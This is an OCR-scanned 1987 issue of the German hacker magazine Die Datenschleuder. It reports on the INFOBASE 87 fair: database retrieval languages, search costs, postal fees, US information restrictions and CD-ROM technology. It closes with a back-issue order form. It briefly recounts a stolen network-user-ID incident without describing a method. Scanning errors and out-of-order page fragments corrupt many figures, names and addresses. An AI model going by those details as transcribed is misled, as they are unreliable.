daß man sich meist nur auf einem Host (Rechner, der Daten- 
I banken anbieiet) auskennen kann. Dazu später unter Grips, 
i Stairs, CCL... mehr. 

- Oft exsisüen die notwendige Hardware nichL Es entstehen 
Amchaffungskosten. die viele abschrecken. 

- Beim Zugriff auf Datenbanken außerhalb der BRD oder 
Europas kommt cs des öfteren zu Problemen, (siehe Know¬ 
ledge Means Money). 

- Eine Datenbankrecherche ist relativ teuer. Es ist eine genaue 
Abwägung notwendig, ob dieses neue Medium winschafllich 
eingesetzt werden kann, (Exemplarische Kosien-Nuizcn- 
Rechnung s.u.). 

- Einige Datenbankproduzenten scheinen nach dem Ex-und- 
hopp Prinzip zu produzieren. In IctzterZeitgabesnicht nur eine 
Quatsch-Explosion sondern auch ein erstaunliches Ver¬ 
schwinden von Datenbanken ohne Ankündigung vom Markt. 


Thomas M. Koch (Koch Consult, Frankfurt/Main) gab einige 
qualitative Anhaltspunkte zur Auswahl einer Datenbank: 

■ Einfachheit im Aufbau 

- Abfragemethoden, die der natürlichen menschlichen Sprache 
angepaßi sind 

- Relationale Verknüpfungsmöglichkeiten 

- Auiomaüsiene Lieferung von intelligenten Entscheidungs- 
Vorschlägen für relationale Datenbanksuche 

- Flexible Kommunikalionsschniustellen 

- Mischung von Texidaien, numerischen Daten und Grafiken 
im Computer des Anwenders. Dies sei nur sehr selten alles 
zusammen bei einem Host realisiert. Jedoch sollte man darauf 
hinarbeiten, daß dies geschehe. 

Für Koch steht jede Datenbank auf drei Säulen: 

- Qualität 

- Geschwindigkeit 

- Preis 


Zum Schluß noch die Auflösung der Datenbankküizel von 
oben: 

“Aids“ ist, wie mancher sich schon gedacht haben wird, eine 
Datenbank über Aids; in “Bonmot“ kann man StMuche und 
Zitate abrufen; “VWWW“ kommt natürlich von VW und 
beinhaltet Informationen zum Kfz-Bau; “Zvet“ ist ein Ein¬ 
kaufsführer durch die Elektro- und Elektronikindustrie. 
“Grips“, “Stairs“, “CCL“ - das sind Namen von Retricval- 
sprachen (Such-). Sie sollen den Fragesteller in die Lage 
versetzen, schnell und einfach seine Antwort zu finden. 

Inwieweit das zuirifft ist fraglich. Es scheint, daß etliche 
Datenbankbenutzer sich beim Einsatz dieser Sprachen die 
Haare raufen: so viele Glatzköpfe wie auf dieser Messe sicht 
man sonst seilen auf einem Haufen. Durchaus verständlich, 
bedenkt man, daß es etwa so viele Retrieval- wie Program¬ 
miersprachen gibt, von denen es wiederum (Basic-)Dta]ekie 
gibt. Im Gegensatz zu Programmiersprachen kann sich der 
Benutzer jedoch meist nicht aussuchen, in welcher Retrieval- 
sprachc er seine Frage stellen möchte. Jeder Host. teilweise 
jede Datenbank auf einem Host. verlangt eine andere Sprache. 

Nun gibt es Relricvalsprachen. die verhalten sich wie Basic- 
Dialekie zueinander. Ein bestimmter Gnindbefehlssalzgleichl 
sich stark, die Syniaxregeln sind dieselben. Andere Reirie- 
valsprachen vehiien sich wie Assembler zu Lisp: nichts ge¬ 
meinsam. So richtig neu wird es für den Benutzer aber erst, 
wenn die Befehle gleichlauten, die Syntax jedoch eine andere 
ist. So sucht man unter Stairs (IbK^ mit dem Kommando 
“..sea" für “search“. Das wird dann erweitert, z.b. “..sea Chaos 
Computer Club and DTX“. Doch unter Bi^Search (Bertels¬ 
mann) lauter das Kommando entweder “..search" oder “..s“ 
(“..s Chaos Computer Club or Hacker“). Befindet man sich 
jedoch auf einem Host der die Common Command Language 
(CCL) der Europäischen Gemeinschaft verwendet (z.b. Echo), 
so lautet der Befehl “f ‘ für find (“f Chaos Computer Club not 
Chaos Communication Congress“). 


GRIPS wiederum ist eineErweileiung (=Dialekl) von CCL. Es 
kennt zusätzliche zu den CCL Kommandos TAB Kommandos 
(Ausgabe von Profiltabellcinträgen = bereits eingegebene und 
verknüpfte Suchbegriffe), MAIL Kommandos (für Briefe an 
den Host) und ORDER Kommandos (zum Bestellen von Do¬ 
kumenten). 



^nJcn^ifjleuber 


Dietmar Strauch (PR(XjRIS • Projektgruppe Informations¬ 
systeme GmbH. Berlin) stellte in seinem Vonrag "Founh 
Generation Retrieval Software • blicken Sic noch durch?“ eine 
rosige Zukunft unter dem Süchwort ’Konfigurierbarkeit’ dar: 
“Die Aufgabe der nächsten Zeit besieht darin. Baukästen für 
Benuizerschnitistellen zu entwerfen, aus denen dann benul- 
zerorientiert bzw. anwendungsspezifisch konkrete Ausfor¬ 
mungen gebildet werden können. Perspeküvisch wird diese 
Entwicklung dazu führen, daß wir im Gebiet der Dialogtech¬ 
niken zu einer Bcnulzerprogrammicrung kommen. Jeder Be¬ 
nutzer stellt,gestülztauf wisscnsbasicflc Komponenten, die für 
Jhn geeigncic Schnittstelle aus den zur Verfügung stehenden 
Elementen zusammen.“ 

Na den mal lau! Das wird viele Neueinsteiger abschrecken. 
Bevor die ihre erste Abfrage machen können müssen sie erst 
mal den Host maßschncidem (-regeln). So schön das auch 
wäre, aber nur geübte Daienbankbenutzcr werden in der Lage 
sein, diese Schnittstellen zu programmieren (für alle anderen). 
Wer sich näher mit Retrievalsprachen beschäftigen will, sei auf 
folgende Publikationen hingewiesen: 

- Information Retrieval miiGrips/Dirs3. Kurzbeschreibung der 

wichtigsten Grips/Dirs3-Kommandos für den LINE-MODE. 
Stand: April 1984. Redaktion: Ingrid Crüger (Sfl- 

Retrievalhüfen 2); Frankfurt am Main: gid, 1984 (Adresse 
unten); 64 Seiten DIN A4, geheftet DM 10,00.-. 

- Information Retrieval mi i Grips/Dirs3. Kurzbeschreibung der 

wichtigsten Grips/Dirs3 Kommandos für den PAGE-MODE. 
Stand: April 1984. Redaktion: Ingrid Crüger (Sft- 

RctricvalhUfen 2); Frankfurt am Main: gid, 1984 (Adresse 
unten); 65 Seiten DIN A4, geheftet DM 10,00 

Diese beiden Hefte sind Einführungen in die Abfragesprache 
Grips/Dirs3 anhand von Beispielen. Sie sind für GripsA>irs3 
Benutzer geschreiben und sollen dem Anfänger als Gedäch- 
nisstfllze und später als Nachschlagewerk bei der Arbeit am 
Bildschirm dienen. 

- Information Retrieval mit STAIRS. Kurzbeschreibung der 

wichtigsten STAIRS-Kommandos anhand von Beispielen. 
Stand: Juli .1982. Radakiion; Ingrid Crüger (Sfi- 

Reirievalhilfcn 1); Frankfurt am Main: gid, 1982 (Adresse 
unten); 81 Seiten DIN A4, geheftet DM 10,00.-. 

Aus dem Inhalt: eine Einführung in das Information Retrieval 
mit STAJRS/Vs - Allgemeines zur Dialog-Struktur eines 
STAIRS Dokuments - Aufbau einer STAIRS-Daienbank - 
Zugriffsschulz Eingangsdialog - Beschreibung der STAIRS- 
Befehle. 

Diese drei Werke sind zu beziehen bei: 

Gesellschaft für Information und Dokumentation (gid) 
Zailralbereich Ergebnislransfer 

Posif^h 710363 
Lyoner Strasse 4448 
D-6000 Frankfurt 71 

Darüber hinaus: 

“Das unsichtbare Element - CCL-Training“ 

Handbuch für Benutzer, Euronet Diane. 

Zusammengesielli von; Gruppe zur Förderung der Europäi¬ 
schen 

Fachinfomnaiionsmarkles, 177, Route d Esch, L-1471 Lu¬ 
xembourg, 

Tde.: 352488041. Telex; 2181; 

KoniaJcipersoncn; Herr Haber, Herr Cornelius. 

S>a<cnSd)lciibct 


Turorials (Lemdikellen); 

DSO (Data Star Online) 

wird unter dem Namen TECPU-Programmierte Unterweisung 
für Retrievalsprache DSO vom Fachinformationszentrum 
Technik für 
DM 35,- vertrieben. 

(Fiz-Technik), Postfach 6(X)547, Osibahnhofstrasse 13, 

6 Frankfurt 1. Tel. 0694308-225. Telex 4189459 fizi d) 


JURIS 

Beim Verlag C.H. Beck (Postfach, 8 München 40) gibts eine 
Schulungsdiskelle für 118 DM und einen Dialogschulungs- 
(Plastik)-Ordner (beinahe so dick wie ein Schönefelder oder 
Satorius) für 148 DM. 

(DSO und JURIS für 220 DM). 

Im Grunde bietet jeder Hostbetreiber Schulungsseminare an. 
wenn man bei ihm einen Vertrag unterschrieben hat Die 
Zeitung OLBG-Info, Das Nachrichienblalt der deutschen 
ONLINE-Benuizergruppe in der DGD e.V. (Deutsche Ge¬ 
sellschaft für Dokumentation e.V., Westendstraße 19,6 Frank¬ 
furt 1) im Heft 1/2 1987 über den Quick-Guide für Koman- 
dosprachen: 

“Die britische ONLINE-Benuizergruppe hat uns milgeteill, 
daß sie den Ukolog Quick Guide to ONLINE Commands 1987 
herausgegeben haL Darin werden die Kommandos der 12 
meistgenutzten Hosts (wie Data Star, Dialog, Dimidi. Blaise, 
Esa-lris, Infoline-SDC, STN, Telesysiems. Questel, Dat^Ive 
u.a.) auf 4 Seiten inTabellenfonn für den schnellen Zugriff am 
Terminal aufgelistet. Ein Informationsblatt zum Quick Guide 
kann bei Sheüa Webber, Briüsh Library, 2 Sheraton Street, 
London W 1V 4 BH. Tel. 01-636-1544, angefordert werden. 
Den QuiclC'Cuidelcann man zum Preis von lObriiischenPfund 
bestellen bei: Institute of Information Scientisis, 44 Museum 
Street, London WC lA ILY, Tel. 01-831-8003“ 

Einige mögen erstaunt sein über die Datumsangaben (Stand...) 
in den Datenbanken. Dies ist jedoch verständlich, wenn man 
die Klage von Dr. Hans Schlarmann (Amwalt) in sdnem Vor¬ 
trag (JURIS-Dalenbank in der Kanzlei) hört. ^ spricht davon, 
daß es nicht ausreiche, einmal eine Retrievalsprache zu lernen. 
Ständig gebe es Erweiterungen und Änderungen, man müsse 
also andauernd sein Wissen aktualisieren. Für einen Recht¬ 
sanwalt meist eine - wegen Zeitmangels - nicht lösbare Auf¬ 
gabe. Folgerung: Software muß her, die die Suche erleichtert, 
mit der man auf allen Hosts die gleiche Benutzeroberfläche hat 

Diese Idee hatte die Firma Softconirol (Fahrenkrön 125, 2 
Hamburg 71, Tel. 040-6432766,GEOT.Sofikontrol) auch. Sie 
entwickelte das Programm METALOG. Es bietet eine ein¬ 
heitliche Benutzeroberfläche für (bisher) die Hosts Juris, Di¬ 
midi, dpa, Genios, Data Star (je 250 DM) und die Mailboxen 
GEOl, GE03 und Telebox (je 150 DM). Als Grundlage be¬ 
nötigt man das Phrogramm Terminal Control (490 DM). ME¬ 
TALOG bietet dann eine Menü-Pull-E>own-Abfragc. Die we¬ 
nige Erfahrungen, die man auf der Messe damit sammeln 
konnte (an dpa hier nochmals vielen Dank: war sehr infor¬ 
mativ), zeigten: wenn man ungefähr weiß, wie man vorzugehen 
hat, z.b. welche Datenbank auf einem Host man anzuwählen 
hat, um an die gesuchten Informationen zu kommen, kann man 
Recherchen durchführen, ohne übermäßig viel lernen zu müs¬ 
sen. 



SqHq 5 


Seile 4 


Numero 21 - Juni 1987 


Numero 21 - Juni 1987 



Ähnliche Gedanken machte sich die Firma Bertelsmann. Für 
ihre Patent-Datenbank PATOS und die von ihnen angeboiencn 
deutschsprachigen Wirtschafisdaienbanken entwickelten sie 
MENTOR, eine vereinfachte Benutzcrfühmng. Im Gegensatz 
zu METALOG, das auf dem PC des Benutzers läuft, läuft 
MENTOR auf dem HosL Das hat den Vorteil, daß es allen 
Hostbenutzem zur Verfügung steht und man nicht an eine 
bestimmte Hardware (bei METALOG IBM oder 1(X)% kom¬ 
patibel) gebunden ist. Wählt man sich zu Bertelsmann durch, 
fragt einen der Hosl, ob man mit BRS/Search (s.o.) oder 
MENTOR arbeiten will. Wählt man letzteres an, unterstützt 
einen MENTOR mit Bedienungshinweisen, Dalenbankbe- 
schreibungen, Hinweisen zu Eingabemöglichkeiten und -for¬ 
malen, sowie zu Menüverzweigungen über Sieuerfunkiionen 
und mit ausgearbcileten Suchstrategien. MENTOR zeigt in der 
Kopfzeile das Kürzel der Datenbank, die aktuelle Seiten¬ 
nummer und Anzahl der Folgeseilen (Gesamtseitenzahl) und 
in der Fußzeile mögliche Sieuerfunktioncn. 

Als Befehle stehen zur Verfügung: AZ = Anzeigen von Do¬ 
kumenten, EN = Ende der Recherche, EX = Wechsel zu 
BRS/Search, ME = Auswahl-Eihstiegsmenü, MQ = Auswahl 
Hier setzt auch die Kritik an: Informationen sollten nicht wegen 
ihrer elektronischen Verfügbarkeit gesperrt werden dürfen. 
Meist ist auch eine “nur“ Beschränkung von Datenbanken 
ineffizient, da es einfach zu viele Verbreitungswege gibt Als 
Beschränkungsmaßnahmen wurden in der Vergangenheit z.B. 
spezielle Paßwörter an Ausländer, die damit nur beschränkten 
Zugriff auf die Datenbank(-en) hatten. 

DieNASAlegteeineLisievon Datenbanken mitausländischen 

Nutzem an. Diese Datenbanken bekamen keine als “classified“ 
eüigesiuften Daten mehr von der NASA. 

Auch bekamen Daienbankanbicier Besuch von Mitarbeitern 
der DOD. CIA eic. Sie sollten ihre Kundenlisten herausrücken, 
und bekanntgeben, wer sich für was interessiert Es wird 
geschätzt, daß die bisherigen Zugangsbeschränkungen einen 
wirtschaftlichen Schaden von 9 Milliarden Dollar = 200.000 
Arbeitsplätze hinterlassen hat 

Die Entwicklung in der B undesrepublik geht dahin, jedem den 
Zugang zu Datenbanken zu gestatten, gleichzeitig jedoch auch 
keinen “Freedom of Information Act“ als Gesetz einzuführen. 



Footprini on ihe Desk 

Mit diesem unübersetzbaren amerikanischen Idiom ist der 
Platz auf dem Schreibtisch gemeint, den der Computer ein- 
nimmt Ein Daienbankanbicier hat diesen “Footprini on the 
Desk“ auf dem Schreibtisch seines Kunden. 

Dieser Footprini kostet den Kunden einen nicht unbeträchtli¬ 
chen Betrag. Grob gesagt kostet eine Stunde Datenbankre¬ 
cherche zwischen 300 und 500 DM. Eine durchschniiüiche 
Recherche ist mit 20-30 Min bei einem geübten Rechercheur 
anzusetzen. Darin enthalten sein können die Datex-Gebühren 
(kommt darauf an, wie teuer die Datenbank ist). Jedoch sind 
nicht enthalten: Lohn-oder Gehallskosten (ein Spitzenkönner 
auf diesem Gebiet kann durchaus noch einmal soviel (und 
mehr) pro Stunde kosten), Amortisation der Hard- und Soft¬ 
ware u.ä. 

Lohnen sich bei desen Preisen überhaupt Datenbanken? 

Dr. Heinrich Ulmer (AUDI AG. Ingolstadt) stellte dazu am 
Beispiel JURIS folgende Kosten-Nutzen-Rechnung auf: 

früher: 20 x 1.5-2 Std. Bibliothek = 35 Std./Monat 
+10 X 1 Std. Fahrzeit = 10 SidyMonat 

45 Std./Monat 

heute; 20 k 15-20 min JURIS Dialog = 6 Std./Monat 
+20 X 15-20 min Bibliothek = 6 Std/Monat 
+ 3x1 Std. Fahizcit = 3 Std./Monat 

15 StdTMonat 


Zeitdifferenz: 30 Std./Monat 
30 X DM 130.- = DM 3900.-. 

Demgegenüber stehen monatliche Kosten für JURIS: 


Hardware-Kostenbeitrag 

Wartung 

Gebühren Bundespost 
Gebühren JURIS 
Sonstige Kosten 
(z.B. Schulung, Information, 
Material) 


DM 300.-, 
DM 100.-. 
DM 500.-. 
DM 600.-. 


DM400.-. 


DM 1900.-, 



bjumero 21 - Juni 1987 


‘^atcnäff|(eiihcr 


des Sachgebietes - Informationsquelle,MB=Neue Suche, SOS 
= Hilfstexte. Hilft das alles nichts, gibt es zwei weitere Mög¬ 
lichkeiten: Entweder SOS od^ der Griff zum B^elsmann 
Sorgen-Telefon. Über den Bertelsmann-Host in Gütersloh gibt 
es ein Gateway zu BRS (Host) in USA. Dort gibt es 140 
Datenbanken zu den unterschic^ichsten Sachbgebieten, je¬ 
doch noch nicht mit MENTOR Unterstützung. 

Bei der Bertelsmann Presse Konferenz wurde dann beides 
vorgeführt, MENTOR wie auch BRS. Heraus kam, daß auch 
der weltgrößte Medienkonzern nur mit Wasser, sprich 300 
Baud Epson Koppler, kocht, ebenfalls auf Datex warten muß, 
im übrigen aber etwas von PR verstehL 

So nebenbei erfuhr man, daß bei der letzten Infobase jemand 
erfolgreich den Bertelsmann-Leuten Über die Schulter ge¬ 
schaut hatte. Zwei Monate später rief die Post au und fragte, ob 
es denn mormal sei, daß man jetzt so oft Datenbanken und 
Mailboxen in Kanada benutzen wUrde. Im übrigen möge man 
doch bitte die Rechnung über 16.(XX) DM begleichen. Die NUI 
fand sich dann auch in einer Mailbox, und jemand wurde 
dingfest gemacht, der gleich ein paar NUIs bei sich rumliegen 
hatte. Der Nachweis, daß dieser Jemand die NUI auch genutzt 
hau sei jedxh bei einem Telefonanschluß relativ schwierig. 

Nähre Informationen (über Datenbanken, nicht über NUI’s) 
bei: Bertelsmann Informaiions Service GmbH, Neumaikter 
Straße 18, 8 München 80, Tel. 08943189-0, Telex: vbmue 
523259. 

Ebenfalls bei Bertelsmann kam die Sprache auf MEGADOC, 
das ist die Gruner&Jahr-Datenbank (STERN-Archiv etc.). Für 
Journalisten, die nicht dem Hause Gniner&Jahr angehören, 
gibt esdie Möglichkeit derOfflinc-Rechcrche.d.h. man richtet 
an C&J eine Daienbankanfrage (Herr Linau, Tel.:O40/4118' 
2051). Die führen nach den Spezifikationen die Recherche 
durch (DurchschnittlicheRecherche» 1 Std. Aufwand,etwa40 
Seiten Textausdnjck = ca. 320 DM) und schicken dann das 
Ergebnis an den Fragesteller. 


Knowledge means money 

Knowledge is power + Time is money = Knowledge means 
money. 

So faßt ChelleO’Connell, einzige Infoimations-Brokerin Buf¬ 
falos (USA) ihreXäiigkeitzusammen. Die USA sind das Land, 
das am freizügigsten mit ihren Informationen umgeht Der 
“Freedom of Information Act“ sichert jedem Weltbürger das 
Recht zu, alle Daten einzusehen, die nicht geheim sind, dem 
Datenxhutz unterliegen oder als sog. “propriatory informa- 
tion“ eigentumsrechtlich geschützt sind. 

Seit etwa 10 Jahren gibt es jedoch eine Diskussion in den USA 
über Beschränkungen von Informationen, die Ausländer be¬ 
treffen. 



0fltcn3tl)IcH&cr 



Teilweise wurden bereits Westeuropäer von technischen Kon¬ 
ferenzen ausgeschlossen. Derlei Dinge zeichnen sich auch - 
immer mal wieder • bei Datenbanken ab. Treibende Kraft ist 
das Department of Defense (DOD; siehe auch Artikel “Me- 
gaconirol“ in dei DATENSCHLEUDER Nr.20). Ein großer 
Teil der US-amerikanischen Forschung wird vom DOD fi¬ 
nanziert Diese Machtposition wurde in der Vergangenheit oft 
dazu genutzt die Forschung zu Geheimhaltung zu verpflichten. 
Die Richtlinie NSDD 145 definiert “sensitive Daten“ als sol¬ 
che, deren Nutzen, Veränderung oder Zerstörung (negativen) 
Einfluß auf die Entwicklung (in) den USA haben könnte. Die 
US - Amerikaner haben schnell erkannt daß Datenbanken eine 
vollkommen neue Qualität von Informationsbeschaffung be¬ 
deuteten. Die Folge war, daß viele Daten nur wegen ihrer 
elektronischen Verfügbarkeit für geheim erklärt wurden. 

Dagegen ist bei den CD-ROMs und der CD-I-Technik in¬ 
zwischen alles standardisiert Die Firmen Philips imd Sony 
geben zusammen folgende “Bücher“ heraus, durch die Li¬ 
zenzen vergeben werden: 

REDBOOK 

Es beschreibt die physikalischen Spezifikationen der Compact 
Disk. 

YELLOW BOOK 

Daiencodierung und Datenformate auf CD-ROM, Scramble- 
Verfahren, Fehlereikennung und Korrektur. 

GREEN BOOK 
CD-I Hard- und Software- 

Unter dem Namen “High Sierra Proposal“ wurde ein Text 
bekannt, der über die Angaben im Yellow Book hinaus die 
Volumen und Filestruktur der CD-Rom regelt. Die “High 
Sierra Group“, so benannt nach dem Ort ihres ersten Zusam¬ 
mentreffens, ist ein Zusammenschluß von Firmen, die aktiv 
oder passiv an der CD-ROM Entwicklung interessim sind. 

Auch bei der Firma Hitachi (Rungedamm 2,2 HH 80, Tele.: 
040/73411-214) wurden konkr^ Zahlen genannt. Die vier 
CD-Player für den Computereinsatz, 3 Stand-Alone-and- 
Beside Geräte und ein Einbaugerät für den IBM-AT (mit dem 
Disk-ControllM* zu betreiben), sind für je 2.500 DM zu haben. 
Sie lesen CD-ROMs mit 552 MB Speicherkapazität mit einer 
Zugriffszeit von 0,5-1 Sekunde und einer Datenaustauschrate 
von 176 KB/s. lEtachi gab zudem die CD-ROM Produk¬ 
tionskosten mit etwa 10.0(X) DM (sehr stark aufwandsabhän¬ 
gig) an. Da dann erst eine CD-ROM existiert und meist mehr 
benötigt werdsn, gab man den weiteren Hinweis auf einen 
Stückpreis von ca 20 DM. bei einer Auflage von l(X)0 Stück. 


Seite 6 


Nuiitcro 21 - Juni 1987 


Seite 7 









Somit Ersparnis monatlich ca DM 2CXX).-. 

Die Deutsche Bundespost macht gerade “Klein-“ Benutzern 
jedoch schnell einen Strich durch solch schöne Rechnungen. 
Sie eritOhte zum l. April 87 die (Datex)Gebühren. Mit etwas 
Kleingedrucktem wurde dem Benutzer der 50 (hzw. 75) 
Sekunden-Takt miigeteilL 


Die Zeitschrift PASS WORD (“Praxisberater für elektronische 
Informationsbeschaffung“, Handelsblau Verlag, Postf, 1102, 
Kas^enstr. 67,4 Düsseldorf 1, Tel. 0211/83880) berichtete 
in ihrer Nr.5/87 übereineEUSIDIC-Uniersuchung über Preise 
der Postverwaltungen in Europa für eine 20 min/llOO Baud- 
Recherche bei einer kostenfreien Datenbank (z.B. ECHO): 
Demnach ist die Bundesrepublik wirklich Spitzenreiter, di 
teuerste Pflaster, Die Liste fingt an bei der Bundesrepublik mit 
4,86 ECU (European Count but not ycl Cash Unit) an, und hört 
auf bei Platz 16, Irland, 0,90 EKuh. Bei Europäischen Ver¬ 
bindungen werden wir (5,73 EQ) in einem spanneden Finish 
I von Finnland (5,81 IQ) auf Platz zwo verwiesen. 

Bei diesen Berechnungen ist die 1.April-Knebelung (und alle 
dachten April, April...) noch nicht bwücksichtigl. Spätestens 
seitdem waren wir wegen 800%-Verteuerung absoluter 
Negativ-Spitzenreiter. Besonders begeistert Uber die Erhöhung 
war man auf dem GENIOS-(Wirtschaflsdaienbanken)-Stand- 
Die Damen und Herren sitzen in Düsseldorf in ihrem Büro, 
blicken vom Screen auf, schauen aus dem Fenster und er- 
bUcken ein Postgebäude, von dem bekannt ist. daß sich darin 
derschwarzeKasten- auch PAD genannt- versteckt, um ab und 
an mal wieder “Datex-P: Auslösung durch Gegenstelle“ ab- 
zuseWeken. Nichizdesdotrotz macht der Gebührenzähler alle 
50 Sekunden einenTick weiter, wahrscheinlich biszum 1.7.87. 
Neuester Stand der Dinge ist , daß die DBP die Gebühren 
wahrscheinlich zum 1.7.1987 wieder dem alten Zustand von 
vor dem 1. April anpassen will. 


CD-ROM, CD-I undWORM 

Glaubt man den Herstellern, dann sind CD-ROMs die Renner 
der Zukunft. Gleich mehrere Finnen stellten Anwendungen auf 
diesem Gebiet vor. 

Exemplarisch sei hier Bertelsmann genannt, die neben dem ja 
schon bekannten “Wer liefert was?“, auch die Bibel, das Orts¬ 
und Straßenverzeichnis der DBP, und eine Pharmakologische 
Datenbankauf CD-ROM verführten. Interessenten machte die 
Bertelsmann Tochterflima BCB (Bertelsmann Computer Be¬ 
ratungsdienst GmbH, Heidenkampsweg 44, 2 HH 1, Tel. 
(MO/23607167) das Ang^t einer Kompletüösung. Die Firma 
Bertelsmann hat alle zur CD-ROM Produktion notwendigen 
Fachleute und Produktionsstäuen, angefangen von der Ana¬ 
lyse des Problems über die Hard- und Softwarelösung bis zur 
CD-Pioduktion und dem folgenden Vertrieb unter ihrem 
Kpnzem-Dach. Der Kunde muß im Grunde nur noch das Geld 
mitbringen. 


Ebenfalls Bertelsmann zeigte einen WORM-(Wriie Once - 
Read Many)-Speicher (200 MByte - 2 GByte). Im Gegensatz 
2 b den CD-Roms gibt auf diesem Gebiet jedcKh noch keine 
internationale Vereinbarung über das Speicherformal. Die 
physikalischen Formate reichen von 5 1/4“ bis 14“, die Spei- 
cherformaie von 200 MByte bis 4 GByte. Zudem gibt es viele 
verschiedene Versionen der Technik, 

Schön war die CD-I Anwendung, die in Ansätzen bei Hitachi 
zu sehen war. CD-I sieht für Compact Disk Interactiv. Das 
bedeutet, daß von dieser CD-I nicht nur Daten sondern auch 
Ton, Bild und/oder Film geliefert wird. Hitachi zeigt eine 
Demonstrations CD-ROM einer amerikanischen Enzyklopä¬ 
die, die schon sehr nahe an dieses Ziel herankam. Man sucht 
nach einem bestimmten Stichwort, der Text wird angezeigt, 
farbig unterlegt sind die Siichwone zu dem weitere Informa¬ 
tionen abrufbar. Zudem sind bei vielen Einträgen Bilder und 
Ton abrufbar. So z.B, ist unter dem Süchwon “Bach“ eine 
Lebens-und Werkbeschreibung abrufbar, die Abbildung einer 
Partitur sowie ein dazu passender Ton-AusschnilL Bei 
Schlachten wird dann ein Bild mit dem Schlachtverlauf und 
einer passenden Schlachimusik geliefert. Noch weiter gehts 
unter dem Stichwort DNA; Etwa ein Viertel des Screens wird 
von einen um sich selbst rotierenden DNA-Molekül- 
Ausschnittmodell eingenommen. Die Audio-Branche hat die¬ 
ses neue Spielzeug auch schon für sich entdeckt. Noch in 
diesem Jahr sollen CD-Player auf den Markt kommen, die die 
neuen Scheiben abspielen können, dann gibts 20 Minuten 
Musikvideo auf CD. 

Insgesamt war die INFOBASE 87 eine lohnende Messe - wenn 
man sie sich leisten konnte: Der Eintritt von 50 DM für alle 
Tage war sicherlich nicht der entscheidende Punkt, sondern die 
Beiträge, die für die Symposien usw, gezahlt werden mußten, 
wollte man an ihnen leilnehmen (z.B. 390 DM für eine Ta¬ 
gung). Die aber waren das eigentlich Interessante. Dort leime 
man die Leute kennen, dort wurden Informationen und Er¬ 
fahrungen gleich gebündelt und durchaus kritisch weilerge¬ 
geben. 

Das eigentliche Messegeschehen war mehr eine Ergänzung zu 
den anderen Veranstaltungen. Dort wurden Einzefgcspräche 
geführt, kamen Anwender mit Spezialproblemen zu den Da- 


icnbankanbieiem. Es wurden sicherlich bei vielen die not¬ 
wendige Erkiärungsgespräche gefuhn. Andrerseits mußte sich 
Z.B. ein JURIS-Boss auf dem Jurislensymposium gegen Kritik 
vom Podium und aus dem Zuhöierkieis wehren. Auf der 
ONUNE-Tagung wurde hart diskutiert, u.a. auch über Kids, 
die leider von einem Zuhörer als “Feinde“ dargestellt wurden, 
daß sie die Statistik verfälschten, wenn sie Datenbankenab¬ 
fragen starteten, die keinen wirtschaftlichen Recherchegrund 
haben. Andererseits gab es vom Auditorium durchaus Zu¬ 
stimmung zu der Aufgabe gerade die Kids und Freaks als 
Kunden von morgen heranzuziehen. 


Die Firma “Wer liefert was?“ GmbH (Postfach 100549,2 HH 
1, Tel. 040/251508-0) hatte nicht nur das Geld, sondern auch 
die Idee und das Datenmaterial. Sie vertreibt schtm in der 
zweiira Auflage (2000 SL; LAufl. 150 St.) ihr Buch auf 
CD-ROM für jeweils 1.950 DM. 


Schade, daß sich in vielen Fällen - wie meistens auf solchen 
Messen - interessante Veranstaltungen Uberschnitten. Alles 
kann man nicht sehen und aufnehmen, schon gar nicht in einem 
solchen Text wiedergeben. Trozdem hoffe ich, daß der Bericht 
dem Leser einige Aufschlüsse über die momentane Situation 
auf dem ONLINE-Markt gegeben hat. und anregt, am Ball zu 
bleiben. 


A.Eichlo’ 


Seite 8 


Numero 21 - Juni 1987 


0nlcn^if|(ctti)rr 


Globalbestellletzen Ausgabe Juni 19B7 

Mit Erscheinen dieses Bestellfetzens verlieren alle alten Versionen ihre Gültigkeit. Wir bitten, künftig 
nur noch den jeweils aktuellen Fetzen zu benutzen. 

Die Datenschleuder 

Die folgenden alten Ausgaben der Datenschleuder sind noch in unterschiedlicher 
Stückzahl erhältlich. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt 
zuerst Gehen mehr Bestellungen ein, als Restezemplare vorhanden sind, gihts 
ersatzweise Aulhacker unserer Wahl. 

Stückprei s Anzahl Summe 

Datenschleuder 01 2.50 

Der CCC stellt sich vor / Hardware für Hacker / Die Hacker - Hsmine — 

Datenschleuder 02 2.50 

H ack mal wieder / U ödem ohne 0 llenbarunsseid 

Datenschleuder 03 2.50 

Uessen 8t Prüien / BTS heisst Büdschirmtrix - 

Datenschleuder 04 2.50 

Telebor / öltrauollsländiges maximegalomanisches Wörterbuch aller Sprachen- 

Datenschleuder 05/05 2.50 

Computer Tutorial / Packet Radio - 

Datenschleuder 08 2.50 

Rat für Piraten / Postprüisatz f SchrumpkBIäh 8# Würfel -- 

Datenschleuder 09 / 10 2.50 

DFÜ-Grunzlagen / CCC '84 - NacLlese - 

Datenschleuder 11 / 12 2.50 

Kennwort Hacklele / ComnutcrkriminaJitäl / Ans lut Amaleurlunk ?- 

Datenschleuder 15 2.50 

Wo bitte sibls ne NUI ? / Trara - die Post ist da! / WiKQ - 

Datenschleuder 16 2.50 

Hille Hacker/CCC - Satzuuz/NUl oft —-- 

Datenschleuder 17 2.50 

CCC '86 / Computervirus 'Rush hour' / Kompromittierende Abslrahlung- 

Datenschleuder 18 2.50 

Compulervireu - Doknznentation / DPA hackt / Volkszähluna '87 - 

Datenschleuder 19 2.50 

CeBit / Art wer ? / Volksquäiuna/ Modem-Chips - 

Datenschleuder 20 2.50 

e/Erbsubstanz in der Rasterlahndune / Uaschinenpersoprülprogramm 

Datenschleuder - Abos 

Gelten für jeweils ein Chaos - Jahr und umlassen etwa acht Ausgaben, sofern nicht höhere Gewalt 
anders entscheidet CCC - Mitglieder erhalten die DS automatisch, müssen also nicht abennieren, 
düriens aber zwecks Aufbesserung unserer Kasse. 

Sozialabo für Schüler, Studenten, Azubis, Renler, Wehrpflichtige, 30.00 
Ersatzdienstler und sonst sozial Benachteiligte 

Standardabo für Otto - Normaluser 60.00 _ 

Fördeiabo für Gutbetuchte 12 0.00 . I „ I. 

1 Summe dieser Sette | 



SnlciiSriilciilicr 


Numero 21 - Juni 1987 


Sehe 9 






Stückt>Teis Anzahl Sümsie 

Die Hackerblbel , Teil Eins 33.33 _ 

Das unentbehiliclie Nachschlagewerk für Hacker und solche, 
die es werden wolleiL Teste von und für Hacker, Dokumentation, 

Meinungen, Lebenshilfe, Lesespass. 1 

Aus dem Inhalt; das Basic-Gefühl * Neues vom CCC * Der Code 
